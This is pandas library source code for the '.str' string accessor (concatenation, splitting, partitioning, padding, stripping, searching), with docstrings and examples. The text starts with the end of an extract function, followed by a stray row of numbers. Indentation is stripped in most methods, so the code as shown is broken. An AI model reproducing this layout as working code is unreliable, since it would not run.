    if isinstance(arr, ABCIndex):
        # Work on a Series so we have .items() and _constructor_expanddim.
        arr = arr.to_series().reset_index(drop=True)
    # Invert groupindex (name -> number) so named groups label the columns;
    # unnamed groups fall back to their zero-based position.
    names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
    columns = [names.get(1 + i, i) for i in range(regex.groups)]
    match_list = []
    index_list = []
    is_mi = arr.index.nlevels > 1
    for subject_key, subject in arr.items():
        if isinstance(subject, str):
            if not is_mi:
                # Normalize scalar keys to 1-tuples so they concatenate with
                # the match counter below.
                subject_key = (subject_key,)
            for match_i, match_tuple in enumerate(regex.findall(subject)):
                if isinstance(match_tuple, str):
                    # re.findall returns bare strings for single-group
                    # patterns; normalize to a tuple.
                    match_tuple = (match_tuple,)
                # findall reports non-participating groups as "" — map to NaN.
                na_tuple = [np.NaN if group == "" else group for group in match_tuple]
                match_list.append(na_tuple)
                result_key = tuple(subject_key + (match_i,))
                index_list.append(result_key)
    from pandas import MultiIndex
    index = MultiIndex.from_tuples(index_list, names=arr.index.names + ["match"])
    dtype = _result_dtype(arr)
    result = arr._constructor_expanddim(
        match_list, index=index, columns=columns, dtype=dtype
    )
    return result
| 32.310943 | 88 | 0.555691 | import codecs
from functools import wraps
import re
from typing import (
Dict,
List,
Optional,
)
import warnings
import numpy as np
import pandas._libs.lib as lib
from pandas.util._decorators import Appender
from pandas.core.dtypes.common import (
ensure_object,
is_bool_dtype,
is_categorical_dtype,
is_integer,
is_list_like,
is_re,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCIndex,
ABCMultiIndex,
ABCSeries,
)
from pandas.core.dtypes.missing import isna
from pandas.core.base import NoNewAttributesMixin
_shared_docs: Dict[str, str] = {}
_cpython_optimized_encoders = (
"utf-8",
"utf8",
"latin-1",
"latin1",
"iso-8859-1",
"mbcs",
"ascii",
)
_cpython_optimized_decoders = _cpython_optimized_encoders + ("utf-16", "utf-32")
def forbid_nonstring_types(forbidden, name=None):
    """
    Decorator factory that raises TypeError when the accessor's inferred
    dtype is one of `forbidden`.

    Parameters
    ----------
    forbidden : list-like of str or None
        Inferred dtypes for which the decorated method must raise.
    name : str, default None
        Method name used in the error message (defaults to the wrapped
        function's ``__name__``).

    Returns
    -------
    callable
        A decorator for StringMethods methods.
    """
    forbidden = [] if forbidden is None else forbidden
    # Everything not explicitly forbidden (out of the dtypes the accessor
    # accepts at all) is permitted.
    permitted = {"string", "empty", "bytes", "mixed", "mixed-integer"}.difference(
        forbidden
    )

    def _forbid_nonstring_types(func):
        method_name = func.__name__ if name is None else name

        @wraps(func)
        def wrapper(self, *args, **kwargs):
            if self._inferred_dtype not in permitted:
                raise TypeError(
                    f"Cannot use .str.{method_name} with values of "
                    f"inferred dtype '{self._inferred_dtype}'."
                )
            return func(self, *args, **kwargs)

        wrapper.__name__ = method_name
        return wrapper

    return _forbid_nonstring_types
def _map_and_wrap(name, docstring):
    """Build an accessor method that forwards to ``_str_<name>`` on the array."""

    @forbid_nonstring_types(["bytes"], name=name)
    def wrapper(self):
        return self._wrap_result(getattr(self._data.array, f"_str_{name}")())

    wrapper.__doc__ = docstring
    return wrapper
class StringMethods(NoNewAttributesMixin):
    def __init__(self, data):
        """Validate `data` (Series/Index) and cache accessor state."""
        from pandas.core.arrays.string_ import StringDtype
        from pandas.core.arrays.string_arrow import ArrowStringDtype
        # Raises AttributeError if `data` is not string-like; the inferred
        # dtype is cached so each method's decorator can re-check cheaply.
        self._inferred_dtype = self._validate(data)
        self._is_categorical = is_categorical_dtype(data.dtype)
        self._is_string = isinstance(data.dtype, (StringDtype, ArrowStringDtype))
        self._data = data
        self._index = self._name = None
        if isinstance(data, ABCSeries):
            self._index = data.index
            self._name = data.name
        # For categoricals operate on the categories, not the codes.
        self._parent = data._values.categories if self._is_categorical else data
        # Keep the original object so results can be rebuilt with its type.
        self._orig = data
        # Disallow creation of new attributes (NoNewAttributesMixin).
        self._freeze()
@staticmethod
def _validate(data):
if isinstance(data, ABCMultiIndex):
raise AttributeError(
"Can only use .str accessor with Index, not MultiIndex"
)
allowed_types = ["string", "empty", "bytes", "mixed", "mixed-integer"]
values = getattr(data, "values", data)
values = getattr(values, "categories", values)
inferred_dtype = lib.infer_dtype(values, skipna=True)
if inferred_dtype not in allowed_types:
raise AttributeError("Can only use .str accessor with string values!")
return inferred_dtype
def __getitem__(self, key):
result = self._data.array._str_getitem(key)
return self._wrap_result(result)
def __iter__(self):
warnings.warn(
"Columnar iteration over characters will be deprecated in future releases.",
FutureWarning,
stacklevel=2,
)
i = 0
g = self.get(i)
while g.notna().any():
yield g
i += 1
g = self.get(i)
    def _wrap_result(
        self,
        result,
        name=None,
        expand=None,
        fill_value=np.nan,
        returns_string=True,
    ):
        """
        Reconstruct `result` as a Series/Index/DataFrame matching the
        original object. `fill_value` is accepted but not used here
        (presumably kept for signature compatibility — TODO confirm).
        """
        from pandas import (
            Index,
            MultiIndex,
        )
        # Scalars and other non-array results pass straight through
        # (DataFrames still get metadata propagated from the original).
        if not hasattr(result, "ndim") or not hasattr(result, "dtype"):
            if isinstance(result, ABCDataFrame):
                result = result.__finalize__(self._orig, name="str")
            return result
        assert result.ndim < 3
        # infer from ndim if expand is not specified
        if expand is None:
            expand = result.ndim != 1
        elif expand is True and not isinstance(self._orig, ABCIndex):
            # Expanding a Series: make every element a list so rows have
            # uniform length for DataFrame construction.
            def cons_row(x):
                if is_list_like(x):
                    return x
                else:
                    return [x]
            result = [cons_row(x) for x in result]
            if result:
                # Pad empty / all-NaN rows out to the max row length.
                max_len = max(len(x) for x in result)
                result = [
                    x * max_len if len(x) == 0 or x[0] is np.nan else x for x in result
                ]
        if not isinstance(expand, bool):
            raise ValueError("expand must be True or False")
        if expand is False:
            # if expand is False, result should have the same name
            # as the original otherwise specified
            if name is None:
                name = getattr(result, "name", None)
            if name is None:
                name = self._orig.name
        if isinstance(self._orig, ABCIndex):
            # if result is a boolean np.array, return the np.array
            # instead of wrapping it into a boolean Index (GH 8875)
            if is_bool_dtype(result):
                return result
            if expand:
                # Expanded Index result becomes a MultiIndex (collapsed back
                # to a flat Index when only one level results).
                result = list(result)
                out = MultiIndex.from_tuples(result, names=name)
                if out.nlevels == 1:
                    out = out.get_level_values(0)
                return out
            else:
                return Index(result, name=name)
        else:
            index = self._orig.index
            # This is a mess.
            dtype: Optional[str]
            # Preserve the string dtype only when the operation returns
            # strings; numeric/boolean results get their natural dtype.
            if self._is_string and returns_string:
                dtype = self._orig.dtype
            else:
                dtype = None
            if expand:
                cons = self._orig._constructor_expanddim
                result = cons(result, columns=name, index=index, dtype=dtype)
            else:
                # Must be a Series
                cons = self._orig._constructor
                result = cons(result, name=name, index=index)
            result = result.__finalize__(self._orig, method="str")
            if name is not None and result.ndim == 1:
                # __finalize__ might copy over the original name, but we may
                # want the new name (e.g. str.extract).
                result.name = name
            return result
    def _get_series_list(self, others):
        """
        Auxiliary function for :meth:`str.cat`. Turn potentially mixed input
        into a list of Series, each aligned/indexed against the caller.
        """
        from pandas import (
            DataFrame,
            Series,
        )
        # Index to attach to list-likes that carry no index of their own.
        idx = self._orig if isinstance(self._orig, ABCIndex) else self._orig.index
        # Generally speaking, dispatch on the concrete container type; the
        # order of these isinstance checks matters (Series before generic
        # list-like, 2-D ndarray before 1-D handling).
        if isinstance(others, ABCSeries):
            return [others]
        elif isinstance(others, ABCIndex):
            return [Series(others._values, index=idx)]
        elif isinstance(others, ABCDataFrame):
            return [others[x] for x in others]
        elif isinstance(others, np.ndarray) and others.ndim == 2:
            others = DataFrame(others, index=idx)
            return [others[x] for x in others]
        elif is_list_like(others, allow_sets=False):
            others = list(others)  # ensure iterators do not get run twice
            # in case of list-like `others`, all elements must be
            # either Series/Index/np.ndarray (1-dim) — recurse per element —
            # or all scalar, in which case `others` is a single column.
            if all(
                isinstance(x, (ABCSeries, ABCIndex))
                or (isinstance(x, np.ndarray) and x.ndim == 1)
                for x in others
            ):
                los: List[Series] = []
                while others:  # iterate through list and append each element
                    los = los + self._get_series_list(others.pop(0))
                return los
            elif all(not is_list_like(x) for x in others):
                return [Series(others, index=idx)]
        raise TypeError(
            "others must be Series, Index, DataFrame, np.ndarray "
            "or list-like (either containing only strings or "
            "containing only objects of type Series/Index/"
            "np.ndarray[1-dim])"
        )
    @forbid_nonstring_types(["bytes", "mixed", "mixed-integer"])
    def cat(self, others=None, sep=None, na_rep=None, join="left"):
        """
        Concatenate strings in the Series/Index with given separator.

        With ``others=None``, all elements are joined into a single string;
        otherwise elements are concatenated element-wise with `others`,
        aligned according to `join`, with `na_rep` controlling missing-value
        handling.
        """
        from pandas import (
            Index,
            Series,
            concat,
        )
        if isinstance(others, str):
            raise ValueError("Did you mean to supply a `sep` keyword?")
        if sep is None:
            sep = ""
        if isinstance(self._orig, ABCIndex):
            # Work on a Series so alignment below is possible.
            data = Series(self._orig, index=self._orig)
        else:  # Series
            data = self._orig
        # concatenate Series/Index with itself if no "others"
        if others is None:
            data = ensure_object(data)
            na_mask = isna(data)
            if na_rep is None and na_mask.any():
                # Drop missing values entirely when no replacement is given.
                data = data[~na_mask]
            elif na_rep is not None and na_mask.any():
                data = np.where(na_mask, na_rep, data)
            return sep.join(data)
        try:
            # turn anything in "others" into lists of Series
            others = self._get_series_list(others)
        except ValueError as err:  # do not catch TypeError raised by _get_series_list
            raise ValueError(
                "If `others` contains arrays or lists (or other "
                "list-likes without an index), these must all be "
                "of the same length as the calling Series/Index."
            ) from err
        # Align if any "others" index differs from the caller's.
        if any(not data.index.equals(x.index) for x in others):
            # Need to add keys for uniqueness in case of duplicate columns.
            others = concat(
                others,
                axis=1,
                join=(join if join == "inner" else "outer"),
                keys=range(len(others)),
                sort=False,
                copy=False,
            )
            data, others = data.align(others, join=join)
            others = [others[x] for x in others]  # again list of Series
        all_cols = [ensure_object(x) for x in [data] + others]
        na_masks = np.array([isna(x) for x in all_cols])
        # A row is "missing" if ANY participating column is missing there.
        union_mask = np.logical_or.reduce(na_masks, axis=0)
        if na_rep is None and union_mask.any():
            # No na_rep: rows with any NA stay NA; concatenate only the rest.
            result = np.empty(len(data), dtype=object)
            np.putmask(result, union_mask, np.nan)
            not_masked = ~union_mask
            result[not_masked] = cat_safe([x[not_masked] for x in all_cols], sep)
        elif na_rep is not None and union_mask.any():
            # Replace NA per column before concatenating.
            all_cols = [
                np.where(nm, na_rep, col) for nm, col in zip(na_masks, all_cols)
            ]
            result = cat_safe(all_cols, sep)
        else:
            # no NaNs - can just concatenate
            result = cat_safe(all_cols, sep)
        # Rebuild as the original container type.
        if isinstance(self._orig, ABCIndex):
            result = Index(
                result, dtype=object, name=self._orig.name
            )
        else:  # Series
            if is_categorical_dtype(self._orig.dtype):
                # We coerce to object dtype — do not keep categorical.
                dtype = None
            else:
                dtype = self._orig.dtype
            result = Series(
                result, dtype=dtype, index=data.index, name=self._orig.name
            )
            result = result.__finalize__(
                self._orig, method="str_cat"
            )
        return result
_shared_docs[
"str_split"
] = r"""
Split strings around given separator/delimiter.
Splits the string in the Series/Index from the %(side)s,
at the specified delimiter string. Equivalent to :meth:`str.%(method)s`.
Parameters
----------
pat : str, optional
String or regular expression to split on.
If not specified, split on whitespace.
n : int, default -1 (all)
Limit number of splits in output.
``None``, 0 and -1 will be interpreted as return all splits.
expand : bool, default False
Expand the split strings into separate columns.
* If ``True``, return DataFrame/MultiIndex expanding dimensionality.
* If ``False``, return Series/Index, containing lists of strings.
Returns
-------
Series, Index, DataFrame or MultiIndex
Type matches caller unless ``expand=True`` (see Notes).
See Also
--------
Series.str.split : Split strings around given separator/delimiter.
Series.str.rsplit : Splits string around given separator/delimiter,
starting from the right.
Series.str.join : Join lists contained as elements in the Series/Index
with passed delimiter.
str.split : Standard library version for split.
str.rsplit : Standard library version for rsplit.
Notes
-----
The handling of the `n` keyword depends on the number of found splits:
- If found splits > `n`, make first `n` splits only
- If found splits <= `n`, make all splits
- If for a certain row the number of found splits < `n`,
append `None` for padding up to `n` if ``expand=True``
If using ``expand=True``, Series and Index callers return DataFrame and
MultiIndex objects, respectively.
Examples
--------
>>> s = pd.Series(
... [
... "this is a regular sentence",
... "https://docs.python.org/3/tutorial/index.html",
... np.nan
... ]
... )
>>> s
0 this is a regular sentence
1 https://docs.python.org/3/tutorial/index.html
2 NaN
dtype: object
In the default setting, the string is split by whitespace.
>>> s.str.split()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
Without the `n` parameter, the outputs of `rsplit` and `split`
are identical.
>>> s.str.rsplit()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `n` parameter can be used to limit the number of splits on the
delimiter. The outputs of `split` and `rsplit` are different.
>>> s.str.split(n=2)
0 [this, is, a regular sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
>>> s.str.rsplit(n=2)
0 [this is a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `pat` parameter can be used to split by other characters.
>>> s.str.split(pat="/")
0 [this is a regular sentence]
1 [https:, , docs.python.org, 3, tutorial, index...
2 NaN
dtype: object
When using ``expand=True``, the split elements will expand out into
separate columns. If NaN is present, it is propagated throughout
the columns during the split.
>>> s.str.split(expand=True)
0 1 2 3 4
0 this is a regular sentence
1 https://docs.python.org/3/tutorial/index.html None None None None
2 NaN NaN NaN NaN NaN
For slightly more complex use cases like splitting the html document name
from a url, a combination of parameter settings can be used.
>>> s.str.rsplit("/", n=1, expand=True)
0 1
0 this is a regular sentence None
1 https://docs.python.org/3/tutorial index.html
2 NaN NaN
Remember to escape special characters when explicitly using regular
expressions.
>>> s = pd.Series(["1+1=2"])
>>> s
0 1+1=2
dtype: object
>>> s.str.split(r"\+|=", expand=True)
0 1 2
0 1 1 2
"""
@Appender(_shared_docs["str_split"] % {"side": "beginning", "method": "split"})
@forbid_nonstring_types(["bytes"])
def split(self, pat=None, n=-1, expand=False):
result = self._data.array._str_split(pat, n, expand)
return self._wrap_result(result, returns_string=expand, expand=expand)
@Appender(_shared_docs["str_split"] % {"side": "end", "method": "rsplit"})
@forbid_nonstring_types(["bytes"])
def rsplit(self, pat=None, n=-1, expand=False):
result = self._data.array._str_rsplit(pat, n=n)
return self._wrap_result(result, expand=expand, returns_string=expand)
_shared_docs[
"str_partition"
] = """
Split the string at the %(side)s occurrence of `sep`.
This method splits the string at the %(side)s occurrence of `sep`,
and returns 3 elements containing the part before the separator,
the separator itself, and the part after the separator.
If the separator is not found, return %(return)s.
Parameters
----------
sep : str, default whitespace
String to split on.
expand : bool, default True
If True, return DataFrame/MultiIndex expanding dimensionality.
If False, return Series/Index.
Returns
-------
DataFrame/MultiIndex or Series/Index of objects
See Also
--------
%(also)s
Series.str.split : Split strings around given separators.
str.partition : Standard library version.
Examples
--------
>>> s = pd.Series(['Linda van der Berg', 'George Pitt-Rivers'])
>>> s
0 Linda van der Berg
1 George Pitt-Rivers
dtype: object
>>> s.str.partition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by the last space instead of the first one:
>>> s.str.rpartition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by something different than a space:
>>> s.str.partition('-')
0 1 2
0 Linda van der Berg
1 George Pitt - Rivers
To return a Series containing tuples instead of a DataFrame:
>>> s.str.partition('-', expand=False)
0 (Linda van der Berg, , )
1 (George Pitt, -, Rivers)
dtype: object
Also available on indices:
>>> idx = pd.Index(['X 123', 'Y 999'])
>>> idx
Index(['X 123', 'Y 999'], dtype='object')
Which will create a MultiIndex:
>>> idx.str.partition()
MultiIndex([('X', ' ', '123'),
('Y', ' ', '999')],
)
Or an index with tuples with ``expand=False``:
>>> idx.str.partition(expand=False)
Index([('X', ' ', '123'), ('Y', ' ', '999')], dtype='object')
"""
@Appender(
_shared_docs["str_partition"]
% {
"side": "first",
"return": "3 elements containing the string itself, followed by two "
"empty strings",
"also": "rpartition : Split the string at the last occurrence of `sep`.",
}
)
@forbid_nonstring_types(["bytes"])
def partition(self, sep=" ", expand=True):
result = self._data.array._str_partition(sep, expand)
return self._wrap_result(result, expand=expand, returns_string=expand)
@Appender(
_shared_docs["str_partition"]
% {
"side": "last",
"return": "3 elements containing two empty strings, followed by the "
"string itself",
"also": "partition : Split the string at the first occurrence of `sep`.",
}
)
@forbid_nonstring_types(["bytes"])
def rpartition(self, sep=" ", expand=True):
result = self._data.array._str_rpartition(sep, expand)
return self._wrap_result(result, expand=expand, returns_string=expand)
def get(self, i):
result = self._data.array._str_get(i)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def join(self, sep):
result = self._data.array._str_join(sep)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def contains(self, pat, case=True, flags=0, na=None, regex=True):
if regex and re.compile(pat).groups:
warnings.warn(
"This pattern has match groups. To actually get the "
"groups, use str.extract.",
UserWarning,
stacklevel=3,
)
result = self._data.array._str_contains(pat, case, flags, na, regex)
return self._wrap_result(result, fill_value=na, returns_string=False)
@forbid_nonstring_types(["bytes"])
def match(self, pat, case=True, flags=0, na=None):
result = self._data.array._str_match(pat, case=case, flags=flags, na=na)
return self._wrap_result(result, fill_value=na, returns_string=False)
@forbid_nonstring_types(["bytes"])
def fullmatch(self, pat, case=True, flags=0, na=None):
result = self._data.array._str_fullmatch(pat, case=case, flags=flags, na=na)
return self._wrap_result(result, fill_value=na, returns_string=False)
@forbid_nonstring_types(["bytes"])
def replace(self, pat, repl, n=-1, case=None, flags=0, regex=None):
if regex is None:
if isinstance(pat, str) and any(c in pat for c in ".+*|^$?[](){}\\"):
msg = (
"The default value of regex will change from True to False "
"in a future version."
)
if len(pat) == 1:
msg += (
" In addition, single character regular expressions will"
"*not* be treated as literal strings when regex=True."
)
warnings.warn(msg, FutureWarning, stacklevel=3)
regex = True
if not (isinstance(repl, str) or callable(repl)):
raise TypeError("repl must be a string or callable")
is_compiled_re = is_re(pat)
if regex:
if is_compiled_re:
if (case is not None) or (flags != 0):
raise ValueError(
"case and flags cannot be set when pat is a compiled regex"
)
elif case is None:
case = True
elif is_compiled_re:
raise ValueError(
"Cannot use a compiled regex as replacement pattern with regex=False"
)
elif callable(repl):
raise ValueError("Cannot use a callable replacement when regex=False")
result = self._data.array._str_replace(
pat, repl, n=n, case=case, flags=flags, regex=regex
)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def repeat(self, repeats):
result = self._data.array._str_repeat(repeats)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def pad(self, width, side="left", fillchar=" "):
if not isinstance(fillchar, str):
msg = f"fillchar must be a character, not {type(fillchar).__name__}"
raise TypeError(msg)
if len(fillchar) != 1:
raise TypeError("fillchar must be a character, not str")
if not is_integer(width):
msg = f"width must be of integer type, not {type(width).__name__}"
raise TypeError(msg)
result = self._data.array._str_pad(width, side=side, fillchar=fillchar)
return self._wrap_result(result)
_shared_docs[
"str_pad"
] = """
Pad %(side)s side of strings in the Series/Index.
Equivalent to :meth:`str.%(method)s`.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with ``fillchar``.
fillchar : str
Additional character for filling, default is whitespace.
Returns
-------
filled : Series/Index of objects.
"""
@Appender(_shared_docs["str_pad"] % {"side": "left and right", "method": "center"})
@forbid_nonstring_types(["bytes"])
def center(self, width, fillchar=" "):
return self.pad(width, side="both", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % {"side": "right", "method": "ljust"})
@forbid_nonstring_types(["bytes"])
def ljust(self, width, fillchar=" "):
return self.pad(width, side="right", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % {"side": "left", "method": "rjust"})
@forbid_nonstring_types(["bytes"])
def rjust(self, width, fillchar=" "):
return self.pad(width, side="left", fillchar=fillchar)
@forbid_nonstring_types(["bytes"])
def zfill(self, width):
result = self.pad(width, side="left", fillchar="0")
return self._wrap_result(result)
def slice(self, start=None, stop=None, step=None):
result = self._data.array._str_slice(start, stop, step)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def slice_replace(self, start=None, stop=None, repl=None):
result = self._data.array._str_slice_replace(start, stop, repl)
return self._wrap_result(result)
def decode(self, encoding, errors="strict"):
if encoding in _cpython_optimized_decoders:
f = lambda x: x.decode(encoding, errors)
else:
decoder = codecs.getdecoder(encoding)
f = lambda x: decoder(x, errors)[0]
arr = self._data.array
result = arr._str_map(f)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def encode(self, encoding, errors="strict"):
result = self._data.array._str_encode(encoding, errors)
return self._wrap_result(result, returns_string=False)
_shared_docs[
"str_strip"
] = r"""
Remove %(position)s characters.
Strip whitespaces (including newlines) or a set of specified characters
from each string in the Series/Index from %(side)s.
Equivalent to :meth:`str.%(method)s`.
Parameters
----------
to_strip : str or None, default None
Specifying the set of characters to be removed.
All combinations of this set of characters will be stripped.
If None then whitespaces are removed.
Returns
-------
Series or Index of object
See Also
--------
Series.str.strip : Remove leading and trailing characters in Series/Index.
Series.str.lstrip : Remove leading characters in Series/Index.
Series.str.rstrip : Remove trailing characters in Series/Index.
Examples
--------
>>> s = pd.Series(['1. Ant. ', '2. Bee!\n', '3. Cat?\t', np.nan])
>>> s
0 1. Ant.
1 2. Bee!\n
2 3. Cat?\t
3 NaN
dtype: object
>>> s.str.strip()
0 1. Ant.
1 2. Bee!
2 3. Cat?
3 NaN
dtype: object
>>> s.str.lstrip('123.')
0 Ant.
1 Bee!\n
2 Cat?\t
3 NaN
dtype: object
>>> s.str.rstrip('.!? \n\t')
0 1. Ant
1 2. Bee
2 3. Cat
3 NaN
dtype: object
>>> s.str.strip('123.!? \n\t')
0 Ant
1 Bee
2 Cat
3 NaN
dtype: object
"""
@Appender(
_shared_docs["str_strip"]
% {
"side": "left and right sides",
"method": "strip",
"position": "leading and trailing",
}
)
@forbid_nonstring_types(["bytes"])
def strip(self, to_strip=None):
result = self._data.array._str_strip(to_strip)
return self._wrap_result(result)
@Appender(
_shared_docs["str_strip"]
% {"side": "left side", "method": "lstrip", "position": "leading"}
)
@forbid_nonstring_types(["bytes"])
def lstrip(self, to_strip=None):
result = self._data.array._str_lstrip(to_strip)
return self._wrap_result(result)
@Appender(
_shared_docs["str_strip"]
% {"side": "right side", "method": "rstrip", "position": "trailing"}
)
@forbid_nonstring_types(["bytes"])
def rstrip(self, to_strip=None):
result = self._data.array._str_rstrip(to_strip)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def wrap(self, width, **kwargs):
result = self._data.array._str_wrap(width, **kwargs)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def get_dummies(self, sep="|"):
result, name = self._data.array._str_get_dummies(sep)
return self._wrap_result(
result,
name=name,
expand=True,
returns_string=False,
)
@forbid_nonstring_types(["bytes"])
def translate(self, table):
result = self._data.array._str_translate(table)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def count(self, pat, flags=0):
result = self._data.array._str_count(pat, flags)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def startswith(self, pat, na=None):
result = self._data.array._str_startswith(pat, na=na)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def endswith(self, pat, na=None):
result = self._data.array._str_endswith(pat, na=na)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def findall(self, pat, flags=0):
result = self._data.array._str_findall(pat, flags)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def extract(self, pat, flags=0, expand=True):
return str_extract(self, pat, flags, expand=expand)
@forbid_nonstring_types(["bytes"])
def extractall(self, pat, flags=0):
return str_extractall(self._orig, pat, flags)
_shared_docs[
"find"
] = """
Return %(side)s indexes in each strings in the Series/Index.
Each of returned indexes corresponds to the position where the
substring is fully contained between [start:end]. Return -1 on
failure. Equivalent to standard :meth:`str.%(method)s`.
Parameters
----------
sub : str
Substring being searched.
start : int
Left edge index.
end : int
Right edge index.
Returns
-------
Series or Index of int.
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["find"]
% {
"side": "lowest",
"method": "find",
"also": "rfind : Return highest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def find(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_find(sub, start, end)
return self._wrap_result(result, returns_string=False)
@Appender(
_shared_docs["find"]
% {
"side": "highest",
"method": "rfind",
"also": "find : Return lowest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def rfind(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_rfind(sub, start=start, end=end)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def normalize(self, form):
result = self._data.array._str_normalize(form)
return self._wrap_result(result)
_shared_docs[
"index"
] = """
Return %(side)s indexes in each string in Series/Index.
Each of the returned indexes corresponds to the position where the
substring is fully contained between [start:end]. This is the same
as ``str.%(similar)s`` except instead of returning -1, it raises a
ValueError when the substring is not found. Equivalent to standard
``str.%(method)s``.
Parameters
----------
sub : str
Substring being searched.
start : int
Left edge index.
end : int
Right edge index.
Returns
-------
Series or Index of object
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["index"]
% {
"side": "lowest",
"similar": "find",
"method": "index",
"also": "rindex : Return highest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def index(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_index(sub, start=start, end=end)
return self._wrap_result(result, returns_string=False)
@Appender(
_shared_docs["index"]
% {
"side": "highest",
"similar": "rfind",
"method": "rindex",
"also": "index : Return lowest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def rindex(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_rindex(sub, start=start, end=end)
return self._wrap_result(result, returns_string=False)
def len(self):
result = self._data.array._str_len()
return self._wrap_result(result, returns_string=False)
_shared_docs[
"casemethods"
] = """
Convert strings in the Series/Index to %(type)s.
%(version)s
Equivalent to :meth:`str.%(method)s`.
Returns
-------
Series or Index of object
See Also
--------
Series.str.lower : Converts all characters to lowercase.
Series.str.upper : Converts all characters to uppercase.
Series.str.title : Converts first character of each word to uppercase and
remaining to lowercase.
Series.str.capitalize : Converts first character to uppercase and
remaining to lowercase.
Series.str.swapcase : Converts uppercase to lowercase and lowercase to
uppercase.
    Series.str.casefold : Removes all case distinctions in the string.
Examples
--------
>>> s = pd.Series(['lower', 'CAPITALS', 'this is a sentence', 'SwApCaSe'])
>>> s
0 lower
1 CAPITALS
2 this is a sentence
3 SwApCaSe
dtype: object
>>> s.str.lower()
0 lower
1 capitals
2 this is a sentence
3 swapcase
dtype: object
>>> s.str.upper()
0 LOWER
1 CAPITALS
2 THIS IS A SENTENCE
3 SWAPCASE
dtype: object
>>> s.str.title()
0 Lower
1 Capitals
2 This Is A Sentence
3 Swapcase
dtype: object
>>> s.str.capitalize()
0 Lower
1 Capitals
2 This is a sentence
3 Swapcase
dtype: object
>>> s.str.swapcase()
0 LOWER
1 capitals
2 THIS IS A SENTENCE
3 sWaPcAsE
dtype: object
"""
_doc_args: Dict[str, Dict[str, str]] = {}
_doc_args["lower"] = {"type": "lowercase", "method": "lower", "version": ""}
_doc_args["upper"] = {"type": "uppercase", "method": "upper", "version": ""}
_doc_args["title"] = {"type": "titlecase", "method": "title", "version": ""}
_doc_args["capitalize"] = {
"type": "be capitalized",
"method": "capitalize",
"version": "",
}
_doc_args["swapcase"] = {
"type": "be swapcased",
"method": "swapcase",
"version": "",
}
_doc_args["casefold"] = {
"type": "be casefolded",
"method": "casefold",
"version": "\n .. versionadded:: 0.25.0\n",
}
@Appender(_shared_docs["casemethods"] % _doc_args["lower"])
@forbid_nonstring_types(["bytes"])
def lower(self):
result = self._data.array._str_lower()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["upper"])
@forbid_nonstring_types(["bytes"])
def upper(self):
result = self._data.array._str_upper()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["title"])
@forbid_nonstring_types(["bytes"])
def title(self):
result = self._data.array._str_title()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["capitalize"])
@forbid_nonstring_types(["bytes"])
def capitalize(self):
result = self._data.array._str_capitalize()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["swapcase"])
@forbid_nonstring_types(["bytes"])
def swapcase(self):
result = self._data.array._str_swapcase()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["casefold"])
@forbid_nonstring_types(["bytes"])
def casefold(self):
result = self._data.array._str_casefold()
return self._wrap_result(result)
_shared_docs[
"ismethods"
] = """
Check whether all characters in each string are %(type)s.
This is equivalent to running the Python string method
:meth:`str.%(method)s` for each element of the Series/Index. If a string
has zero characters, ``False`` is returned for that check.
Returns
-------
Series or Index of bool
Series or Index of boolean values with the same length as the original
Series/Index.
See Also
--------
Series.str.isalpha : Check whether all characters are alphabetic.
Series.str.isnumeric : Check whether all characters are numeric.
Series.str.isalnum : Check whether all characters are alphanumeric.
Series.str.isdigit : Check whether all characters are digits.
Series.str.isdecimal : Check whether all characters are decimal.
Series.str.isspace : Check whether all characters are whitespace.
Series.str.islower : Check whether all characters are lowercase.
Series.str.isupper : Check whether all characters are uppercase.
Series.str.istitle : Check whether all characters are titlecase.
Examples
--------
**Checks for Alphabetic and Numeric Characters**
